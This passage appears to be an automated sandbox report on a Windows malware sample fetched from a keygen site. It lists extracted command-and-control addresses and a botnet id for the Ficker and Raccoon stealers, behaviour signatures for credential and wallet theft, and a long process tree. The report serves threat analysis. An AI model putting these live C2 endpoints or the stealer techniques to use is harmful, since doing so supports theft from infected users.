Resubmissions

22-04-2021 16:45

210422-k9xv9nxcbx 10

21-04-2021 17:01

210421-pl1rqeqs7n 10

21-04-2021 12:53

210421-gkr26l4mvs 10

20-04-2021 19:55

210420-nex8ep6zhj 10

20-04-2021 15:03

210420-v63pp18knj 10

Analysis

  • max time kernel
    1800s
  • max time network
    1802s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-04-2021 15:03

General

Malware Config

Extracted

Family

fickerstealer

C2

212.64.215.73:81

sodaandcoke.top:80

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 57 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 28 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 48 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1384
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2520
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2824
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2780
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2536
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1948
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1428
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1192
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1104
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:60
                      • C:\Users\Admin\AppData\Roaming\iwhuvbs
                        C:\Users\Admin\AppData\Roaming\iwhuvbs
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:6668
                        • C:\Users\Admin\AppData\Roaming\iwhuvbs
                          "C:\Users\Admin\AppData\Roaming\iwhuvbs"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6908
                      • C:\Users\Admin\AppData\Roaming\iwhuvbs
                        C:\Users\Admin\AppData\Roaming\iwhuvbs
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1372
                        • C:\Users\Admin\AppData\Roaming\iwhuvbs
                          "C:\Users\Admin\AppData\Roaming\iwhuvbs"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6908
                      • C:\Users\Admin\AppData\Roaming\iwhuvbs
                        C:\Users\Admin\AppData\Roaming\iwhuvbs
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4216
                        • C:\Users\Admin\AppData\Roaming\iwhuvbs
                          "C:\Users\Admin\AppData\Roaming\iwhuvbs"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          PID:6708
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1004
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html
                        1⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:1016
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffcca524f50,0x7ffcca524f60,0x7ffcca524f70
                          2⤵
                            PID:2148
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1552 /prefetch:2
                            2⤵
                              PID:2584
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1808 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2804
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
                              2⤵
                                PID:3188
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
                                2⤵
                                  PID:3256
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
                                  2⤵
                                    PID:3052
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                    2⤵
                                      PID:2756
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
                                      2⤵
                                        PID:3808
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                                        2⤵
                                          PID:3948
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                                          2⤵
                                            PID:4128
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
                                            2⤵
                                              PID:4548
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6096 /prefetch:8
                                              2⤵
                                                PID:4740
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:8
                                                2⤵
                                                  PID:4792
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6416 /prefetch:8
                                                  2⤵
                                                    PID:4812
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6560 /prefetch:8
                                                    2⤵
                                                      PID:4880
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:8
                                                      2⤵
                                                        PID:4916
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
                                                        2⤵
                                                          PID:4928
                                                        • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                          "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                          2⤵
                                                            PID:4988
                                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff608dda890,0x7ff608dda8a0,0x7ff608dda8b0
                                                              3⤵
                                                                PID:5016
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6548 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5064
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6140 /prefetch:8
                                                              2⤵
                                                                PID:5084
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
                                                                2⤵
                                                                  PID:4144
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6404 /prefetch:8
                                                                  2⤵
                                                                    PID:4156
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:8
                                                                    2⤵
                                                                      PID:4328
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5680 /prefetch:8
                                                                      2⤵
                                                                        PID:4492
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:8
                                                                        2⤵
                                                                          PID:4556
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6912 /prefetch:8
                                                                          2⤵
                                                                            PID:4580
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6924 /prefetch:8
                                                                            2⤵
                                                                              PID:1836
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:8
                                                                              2⤵
                                                                                PID:1532
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7072 /prefetch:8
                                                                                2⤵
                                                                                  PID:4824
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:8
                                                                                  2⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:4876
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4932
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4740
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4956
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6664 /prefetch:8
                                                                                        2⤵
                                                                                          PID:5056
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7216 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4568
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7364 /prefetch:8
                                                                                            2⤵
                                                                                              PID:5088
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7500 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4140
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7632 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1404
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7480 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4888
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:4592
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4336 /prefetch:8
                                                                                                      2⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:4948
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4204
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4152
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:2760
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4828
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:4980
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:4840
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:4556
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:1572
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:4992
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:1404
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4092 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:4808
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:5056
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:2152
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:4196
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
